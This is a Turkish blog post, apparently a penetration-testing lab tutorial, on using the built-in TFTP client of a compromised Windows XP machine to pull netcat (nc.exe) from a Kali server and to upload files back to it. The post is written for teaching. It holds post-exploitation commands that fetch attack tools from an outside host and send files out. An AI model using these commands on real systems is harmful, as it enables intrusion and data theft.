SGE Blog Yayınları

Ters Kabuk ile Sızılan Windows Sistemlere Dosya İndirme - TFTP

Ters Kabuk ile Sızılan Windows Sistemlere Dosya İndirme - TFTP

yazan Hasan Fatih Şimşek -
Number of replies: 0

TFTP udp tabanlı bir dosya transfer protokolüdür. Windows XP ve 2003'e kadarki Windows sistemlerde tftp client varsayılan olarak gelmektedir. Ancak Windows 7 ve 2008 sonrası için tftp client ekstradan eklenmesi gereken bir tool'dur. Onun yerine bu versiyonlarda varsayılan olarak gelen ftp protokolü kullanılabilir. 

TFPT client'ları Windows XP ve 2003'e kadarki windows sistemlerde varsayılan olarak yer aldığından dolayı bu sistemlere sızıldığı vakit sızılan sistemin komut satırından tftp client'ı kullanılarak kendi makinamızdaki dosyaları sızılan sisteme indirebiliriz. Böylelikle hak yükseltme gibi çeşitli işlemler yapabiliriz.

Uygulama 1

Şimdi Windows XP makinasına tftp client ile Kali'den dosya çekelim.

Gereksinimler

- Windows XP                                           [ TFTP İstemcisi ]

- Kali (Eski)                        // 1.0.4            [ TFPT Sunucusu ]

Öncelikle Kali sanal makinasının kök dizininde bir tane tftp klasörü açalım. Ardından tftp daemon'ını bu dizinde başlatalım.

Kali Konsol:
> mkdir /tftp
> atftpd --daemon --port 69 /tftp
Not: /tfpt dizini dosya sisteminin kökünde oluşturulmadığı takdirde dosya transferi 
yapılamamaktadır. Yapılabilmesi için ekstradan konfigurasyon ayarları yapılması 
gerekmekteymiş. Ayrıntılı bilgi için bkz. https://social.technet.microsoft.com/Forums/ windows/en-US/afc5994a-71b0-42c6-a9e0-fc3a2ac95f88/windows-wds-2008-r2-64bit-tftp-error- code-4-access-violation-message-when-we-try-to-get-files?forum=winserversetup

Böylece Kali sanal makinasında tftp sunucusu başlatılmış olacaktır. Şimdi kali'de yer alan nc.exe dosyasını /tftp dizini içine kopyalayalım.

Kali Konsol:
> cp /usr/share/windows-binaries/nc.exe /tftp/

Ardından Windows XP sanal makinasinden Kali'deki TFPT sunucusunda olan nc.exe dosyasını çekelim.

Windows XP Konsol:
> tftp -i 172.16.3.89 get nc.exe // Kali IP'si konur.
Output:
Aktarım başarılı: 1 saniyede 59392 bayt, 59392 bayt/s

Böylece windows sisteminde bulunulan dizine nc.exe dosyası gelecektir.

Sonuç olarak bu işlem ile sızılan bir windows makinasının komut satırı üzerinden kendisinde varsayılan olarak var olan tftp client ile dosya upload'lama yapılabileceği görülmüştür ve bu sayede sistemde hak yükseltme gibi işlemlerin gerçekleştirilebileceği görülmüştür.

Uygulama 2

TFTP ile dosya çekebildiğimiz gibi dosya yükleye de biliriz. Şimdi Windows XP sanal makinasından TFPT sunucusuna (Kali'ye) dosya yükleyelim.

Gereksinimler

- Windows XP                        [ TFTP İstemcisi ]

- Kali                      // 1.0.4      [ TFPT Sunucusu ]

Bu işlem için Kali kök dizininde tftp adlı bir klasör oluştaralım ve iznini 777 yapalım. Ardından tftp daemon'ını bu dizinde başlatalım.

Kali Konsol:
> mkdir /tftp
> chmod -R 777 /tftp
> atftpd --daemon --port 69 /tftp
Not: /tfpt dizini dosya sisteminin kökünde oluşturulmadığı takdirde dosya transferi 
yapılamamaktadır. Yapılabilmesi için ekstradan konfigurasyon ayarları yapılması 
gerekmekteymiş. Ayrıntılı bilgi için bkz. https://social.technet.microsoft.com/Forums/windows /en-US/afc5994a-71b0-42c6-a9e0-fc3a2ac95f88/windows-wds-2008-r2-64bit-tftp-error-code-4-access- violation-message-when-we-try-to-get-files?forum=winserversetup

Böylece TFTP sunucumuz dosya almaya müsait duruma gelecektir. Şimdi Windows XP 'ten bir txt dosyasını TFTP sunucusuna (Kali'ye) gönderelim.

Windows XP:
> tftp -i 172.16.3.89 put deneme.txt deneme.txt // Kali IP'si konur.
          |          |
                (Upload'lanacak Dosya) (Hedef sistemdeki ismi)
Output:
Aktarım başarılı: 1 saniyede 7 bayt, 7 bayt/s

Görüldüğü üzere dosya upload'lama işlemi tamamlanmıştır. Kali'de /tftp dizinine bakıldığında yüklenen dosya görünecektir.

Kali /tftp dizini:

deneme.txt

Yararlanılan Kaynak:

https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/tftp.mspx?mfr=true



450 kelime